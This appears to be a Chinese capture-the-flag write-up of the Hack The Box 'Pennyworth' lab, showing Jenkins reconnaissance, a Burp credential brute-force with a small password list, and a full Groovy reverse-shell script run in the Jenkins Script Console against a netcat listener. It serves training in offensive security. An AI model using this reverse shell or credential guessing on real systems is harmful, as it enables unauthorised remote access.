当前位置: 首页 > news >正文

[StartingPoint][Tier1]Pennyworth

news 来源:原创 2024/5/9 12:47:48

Important

Jenkins是一个用于自动化构建、测试和部署软件项目的开源持续集成和持续部署(CI/CD)工具。它允许开发团队自动执行和监控在软件开发过程中的重复性任务,例如构建代码、运行测试、部署应用程序等。Jenkins提供了一个易于使用的Web界面,可以配置各种任务和工作流,并通过插件系统扩展其功能,以满足不同团队和项目的需求。Jenkins的灵活性和可扩展性使其成为许多开发团队的首选工具,用于构建和交付高质量的软件。

Task 1

What does the acronym CVE stand for?

(CVE的全称?)

Common Vulnerabilities and Exposures

Task 2

What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?

(在网络安全中CIA分别代表什么意思?)

Confidentiality, Integrity, Availability

Task 3

What is the version of the service running on port 8080?

(8080端口上运行的服务版本是多少?)

# nmap -sC -sV 10.129.141.102 -p 8080

image.png

Jetty 9.4.39.v20210325

Task 4

What version of Jenkins is running on the target?

(服务端运行的Jenkins是哪个版本?)

$ curl "http://10.129.141.102:8080/error" | grep "version"

image.png

或则访问页面

image.png

2.289.1

Task 5

What type of script is accepted as input on the Jenkins Script Console?

(在Jenkins脚本控制台,输入的是什么类型的脚本?)

Burp 爆破

-username-
admin
root
test
guest

-password-
admin123
root
password
qwerty123

image.png

image.png

Groovy

Task 6

What would the “String cmd” variable from the Groovy Script snippet be equal to if the Target VM was running Windows?

(如果目标虚拟机正在运行 Windows,那么 Groovy 脚本片段中的 ‘String cmd’ 变量将等于什么?)

cmd.exe

Task 7

What is a different command than “ip a” we could use to display our network interfaces’ information on Linux?

(除了 ‘ip a’ 命令外,我们还可以使用哪个命令在 Linux 上显示网络接口的信息?)

ifconfig

Task 8

What switch should we use with netcat for it to use UDP transport mode?

(netcat用什么选项可以用udp传输)

-u

Task 9

What is the term used to describe making a target host initiate a connection back to the attacker host?

(受害者反向连接攻击者主机,那么这个是什么专业术语)

reverse shell

Flag

nc监听10032端口

$ nc -lvnp 10032

image.png

反向shell脚本

String host="{your_IP}";
int port=10032;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new
Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed())
{while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());
while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try
{p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

到Dashboard->Manage Jenkins->Script Console

image.png

image.png

9cdfb439c7876e703e307864c9167a15

相关文章:

  • 【LeetCode热题100】33. 搜索旋转排序数组(二分)
  • Java后端开发中Java 8,JVM和JDK的关系
  • C语言如何声明外部变量?
  • 一条SQL查询语句的执行顺序
  • mysql慢sql排查与分析
  • Blender怎么样启动默认移动和Cavity效果
  • 理解 Golang 变量在内存分配中的规则
  • ics-05-攻防世界
  • 爬取高校专业信息的Python爬虫简介与实践
  • 【C++ STL算法】sort 排序
  • 隐私计算实训营学习七:隐语SCQL的架构详细拆解
  • 数据库的基本操作
  • 面试题多态结合线程
  • 【TI毫米波雷达】IWR6843AOP的官方文件资源名称BUG,选择xwr68xx还是xwr64xx,及需要注意的问题
  • 【测试面试题】14题常见APP测试面试题(参考答案)
  • [js高手之路]搞清楚面向对象,必须要理解对象在创建过程中的内存表示
  • crontab执行失败的多种原因
  • ES学习笔记(10)--ES6中的函数和数组补漏
  • EventListener原理
  • gitlab-ci配置详解(一)
  • MYSQL如何对数据进行自动化升级--以如果某数据表存在并且某字段不存在时则执行更新操作为例...
  • SpringBoot 实战 (三) | 配置文件详解
  • Vue.js源码(2):初探List Rendering
  • 仿天猫超市收藏抛物线动画工具库
  • 湖南卫视:中国白领因网络偷菜成当代最寂寞的人?
  • 简析gRPC client 连接管理
  • 开放才能进步!Angular和Wijmo一起走过的日子
  • 漫谈开发设计中的一些“原则”及“设计哲学”
  • 腾讯大梁:DevOps最后一棒,有效构建海量运营的持续反馈能力
  • 用Node EJS写一个爬虫脚本每天定时给心爱的她发一封暖心邮件
  • #我与Java虚拟机的故事#连载17:我的Java技术水平有了一个本质的提升
  • %3cli%3e连接html页面,html+canvas实现屏幕截取
  • (01)ORB-SLAM2源码无死角解析-(66) BA优化(g2o)→闭环线程:Optimizer::GlobalBundleAdjustemnt→全局优化
  • (Redis使用系列) SpirngBoot中关于Redis的值的各种方式的存储与取出 三
  • (草履虫都可以看懂的)PyQt子窗口向主窗口传递参数,主窗口接收子窗口信号、参数。
  • (附源码)ssm户外用品商城 毕业设计 112346
  • (力扣)循环队列的实现与详解(C语言)
  • (全部习题答案)研究生英语读写教程基础级教师用书PDF|| 研究生英语读写教程提高级教师用书PDF
  • (十八)用JAVA编写MP3解码器——迷你播放器
  • (一)使用Mybatis实现在student数据库中插入一个学生信息
  • .Net CF下精确的计时器
  • .NET微信公众号开发-2.0创建自定义菜单
  • .Net下C#针对Excel开发控件汇总(ClosedXML,EPPlus,NPOI)
  • /etc/apt/sources.list 和 /etc/apt/sources.list.d
  • /etc/sudoers (root权限管理)
  • @DataRedisTest测试redis从未如此丝滑
  • @Service注解让spring找到你的Service bean
  • [ vulhub漏洞复现篇 ] Django SQL注入漏洞复现 CVE-2021-35042
  • [ 云计算 | AWS ] AI 编程助手新势力 Amazon CodeWhisperer:优势功能及实用技巧
  • [.NET 即时通信SignalR] 认识SignalR (一)
  • [@Controller]4 详解@ModelAttribute
  • []新浪博客如何插入代码(其他博客应该也可以)
  • [1181]linux两台服务器之间传输文件和文件夹
  • [20160902]rm -rf的惨案.txt
  • [AIGC] SQL中的数据添加和操作:数据类型介绍